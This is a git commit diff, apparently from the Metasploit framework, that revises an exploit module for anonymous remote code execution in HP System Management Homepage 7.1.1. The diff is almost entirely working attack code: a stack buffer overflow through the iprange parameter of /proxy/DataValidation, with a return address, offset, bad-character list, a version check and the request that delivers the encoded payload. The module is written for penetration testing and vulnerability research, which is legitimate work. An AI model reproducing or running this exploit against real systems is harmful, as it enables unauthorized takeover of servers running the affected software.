cleanup for hp_system_management

unstable
jvazquez-r7 2013-03-29 18:02:23 +01:00
parent 139926a25b
commit c55a3870a8
1 changed files with 59 additions and 26 deletions

View File

@ -8,7 +8,9 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking Rank = NormalRanking
HttpFingerprint = { :pattern => [ /HP System Management Homepage/ ] }
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
@ -16,24 +18,32 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'HP System Management Anonymous Access Code Execution', 'Name' => 'HP System Management Anonymous Access Code Execution',
'Description' => %q{ 'Description' => %q{
This module exploits an anonymous remote code execution on hp system management 7.1.1 and inferior. This module exploits an anonymous remote code execution on HP System Management
7.1.1 and earlier. The vulnerability exists when handling the iprange parameter on
a request against /proxy/DataValidation. In order to work HP System Management must
be configured with Anonymous access enabled.
}, },
'Author' => [ 'agix - @agixid' ], 'Author' => [ 'agix' ], # @agixid
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Payload' => 'Payload' =>
{ {
'DisableNops' => true, 'DisableNops' => true,
'Space' => 1000, 'Space' => 1000,
'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20", 'BadChars' => "\x00\x25\x0a\x0b\x0d\x3a\x3b\x09\x0c\x23\x20",
'EncoderOptions' =>
{
'BufferRegister' => 'ESP' # See the comments below
}
}, },
'Platform' => ['linux'], 'Platform' => ['linux'],
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'References' => 'References' =>
[ [
['URL', 'http://bit.ly/YhjikT'] #['URL', 'http://bit.ly/YhjikT'],
] #['OSVDB', 'http://bit.ly/YhjikT']
'Targets' => [ ],
'Targets' =>
[
[ 'HP System Management 7.1.1 - Linux (CentOS)', [ 'HP System Management 7.1.1 - Linux (CentOS)',
{ {
'Ret' => 0x8054e14, # push esp / ret 'Ret' => 0x8054e14, # push esp / ret
@ -46,26 +56,49 @@ class Metasploit3 < Msf::Exploit::Remote
'Offset' => 267 'Offset' => 267
} }
] ]
], ],
'DisclosureDate' => 'Sep 01 2012', 'DisclosureDate' => 'Sep 01 2012',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(2381),
OptBool.new('SSL', [true, 'Use SSL', true])
], self.class)
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => "/cpqlogin.htm"
})
if res and res.code == 200 and res.body =~ /"HP System Management Homepage v(.*)"/
version = $1
return Exploit::CheckCode::Vulnerable if version <= "7.1.1.1"
end
return Exploit::CheckCode::Safe
end
def exploit def exploit
padding = rand_text(target['Offset'])
padding = rand_text_alpha(target['Offset'])
ret = [target['Ret']].pack('V') ret = [target['Ret']].pack('V')
uri = "/proxy/DataValidation"
iprange = "a-bz"+padding+ret+payload.encoded iprange = "a-bz"+padding+ret+payload.encoded
print_status("Sending #{uri.length} bytes payload...")
print_status("#{rhost}:#{rport} - Sending exploit...")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => uri, 'uri' => "/proxy/DataValidation",
'encode_params' => false,
'vars_get' => { 'vars_get' => {
'iprange' => iprange 'iprange' => iprange
} }
}) })
handler
end end
end end